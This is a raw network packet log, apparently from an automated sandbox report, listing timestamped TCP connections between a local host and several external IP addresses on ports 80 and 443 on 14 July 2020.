                                                                                                                                      Jul 14, 2020 11:20:45.236664057 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236701012 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236730099 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236752987 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236776114 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236803055 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236829042 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236855030 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236881971 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236900091 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236908913 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236934900 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236958027 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236980915 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237005949 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237031937 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237057924 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237088919 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237131119 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237139940 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.237169027 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237210035 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237240076 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237266064 CEST44349710185.206.163.136192.168.1.102
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2020 11:20:45.237267971 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:45.237293005 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237315893 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237339020 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237360954 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237384081 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237406015 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237428904 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237451077 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237473965 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237497091 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237519979 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.237731934 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:45.366123915 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366162062 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366183996 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366208076 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366231918 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366255045 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366276979 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366301060 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366311073 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:45.366322041 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366347075 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:45.366425037 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:46.780814886 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:46.872651100 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:46.872814894 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.414891005 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.471918106 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.503587008 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.503717899 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.536142111 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.536407948 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.536647081 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.600753069 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.600995064 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.665286064 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.750269890 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.750299931 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:47.750380039 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.776303053 CEST | 49711 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:47.840558052 CEST | 80 | 49711 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:48.780544043 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:48.869982958 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:48.870196104 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:49.864257097 CEST | 443 | 49709 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:49.864300966 CEST | 443 | 49709 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:49.864448071 CEST | 49709 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:50.487967968 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:50.576773882 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:50.577143908 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:51.071022987 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:51.159069061 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:51.159182072 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:51.760432959 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:51.760464907 CEST | 443 | 49710 | 185.206.163.136 | 192.168.1.102
Jul 14, 2020 11:20:51.760493040 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:51.760612965 CEST | 49710 | 443 | 192.168.1.102 | 185.206.163.136
Jul 14, 2020 11:20:51.771171093 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:51.864172935 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:51.864284039 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:52.231311083 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:52.319689035 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:52.319865942 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:52.748272896 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:52.841948986 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:52.842122078 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:53.165904999 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:53.257359028 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:53.257487059 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:53.590437889 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:53.680881023 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:53.681041002 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.015072107 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.102811098 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:54.103132010 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.420243979 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.508830070 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:54.509226084 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.879888058 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:54.967772961 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:54.967951059 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:55.323348045 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:55.411665916 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:55.411830902 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:55.715173006 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:55.803328037 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:55.803541899 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:56.118315935 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:56.206547976 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:56.206805944 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:56.515702963 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:56.603728056 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:56.604010105 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:56.913007021 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:57.003186941 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:57.003505945 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:57.308516026 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:57.396816969 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:57.397053003 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:57.710084915 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:57.800950050 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:57.801256895 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:58.160001040 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:58.248193026 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:58.248359919 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:58.584129095 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:58.674938917 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:58.675134897 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:58.996056080 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:59.084211111 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:59.084388971 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:59.387290001 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:20:59.475527048 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:20:59.475701094 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:00.137196064 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:00.234807014 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:00.235012054 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:01.166742086 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:01.257086039 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:01.257251978 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:01.638675928 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:01.727490902 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:01.727709055 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:02.484544992 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:02.583926916 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:02.584038019 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:02.584180117 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:02.943934917 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:03.004053116 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.041389942 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.041649103 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:03.368863106 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:03.468781948 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.472527027 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.472753048 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:03.796293974 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:03.856543064 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.894206047 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:03.894478083 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:04.232069969 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:04.330991983 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:04.331398010 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:04.655843973 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:04.755819082 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:04.758372068 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:04.758706093 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:05.177768946 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:05.237965107 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:05.267096996 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:05.267231941 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:05.559700012 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:05.653503895 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:05.653789043 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:05.965733051 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:06.053298950 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:06.053553104 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:06.352188110 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:06.443144083 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:06.443527937 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:06.757255077 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:06.845221043 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:06.845520973 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:07.170154095 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:07.261219978 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:07.261480093 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:07.583682060 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:07.677033901 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:07.677236080 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:08.011208057 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:08.099565983 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:08.099822998 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:08.460201025 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
Jul 14, 2020 11:21:08.553215027 CEST | 80 | 49706 | 91.218.231.226 | 192.168.1.102
Jul 14, 2020 11:21:08.553394079 CEST | 49706 | 80 | 192.168.1.102 | 91.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.942475080 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.033268929 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.033406019 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.489628077 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.580629110 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.580826044 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.875055075 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.963622093 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.964097977 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.329473019 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.419209003 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:10.419548988 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.738768101 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.827363968 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:10.827696085 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.152817965 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.241822004 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:11.242048979 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.548130989 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.638955116 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:11.639200926 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.986920118 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.075288057 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:12.075417995 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.376663923 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.464622974 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:12.464775085 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.955755949 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.046689034 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:13.046945095 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.388264894 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.479176998 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:13.479382992 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.928440094 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.019418001 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:14.019582987 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.396789074 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.489926100 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:14.490202904 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.137546062 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.231205940 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:15.231451035 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.920120001 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.016776085 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.016915083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.324270964 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.419513941 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.419786930 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.756951094 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.848412991 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.848547935 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.157701969 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.248116970 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:17.248533964 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.539499998 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.629945993 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:17.630156040 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.947969913 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.045984030 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:18.046227932 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.495517969 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.591042995 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:18.591264009 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.911391020 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.008234978 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.008493900 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.344836950 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.443614960 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.443761110 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.803771973 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.804891109 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.814433098 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.840445042 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.840583086 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.841192961 CEST80497158.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.841270924 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.842713118 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.910614967 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.910706043 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.922374964 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.082928896 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.082961082 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.083096027 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:20.084532976 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:20.121005058 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.499816895 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:20.595278978 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.595436096 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:20.936074018 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.027698994 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:21.027971029 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.336246967 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.427649975 CEST804970691.218.231.226192.168.1.102
